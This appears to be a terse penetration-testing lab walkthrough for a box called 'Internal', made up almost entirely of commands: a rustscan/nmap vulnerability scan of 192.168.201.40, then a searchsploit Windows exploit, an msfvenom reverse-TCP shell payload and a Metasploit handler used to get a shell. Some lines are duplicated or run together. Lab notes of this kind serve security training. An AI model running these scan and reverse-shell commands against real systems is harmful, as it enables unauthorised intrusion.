Internal
nmap
mkdir nmap
sudo rustscan -a 192.168.201.40 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan --scripts vuln
Exploitation





Last updated
mkdir nmap
sudo rustscan -a 192.168.201.40 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan --scripts vuln





Last updated
searchsploit -m windows/remote/40280.py msfvenom -p windows/shell/reverse_tcp LHOST=192.168.49.201 LPORT=4444 EXITFUNC=thread -f python -v shelluse exploit/multi/handler
set payload windows/shell/reverse_tcp
set lhost tun0
set exitfunc thread
runpython 40280.py 192.168.201.40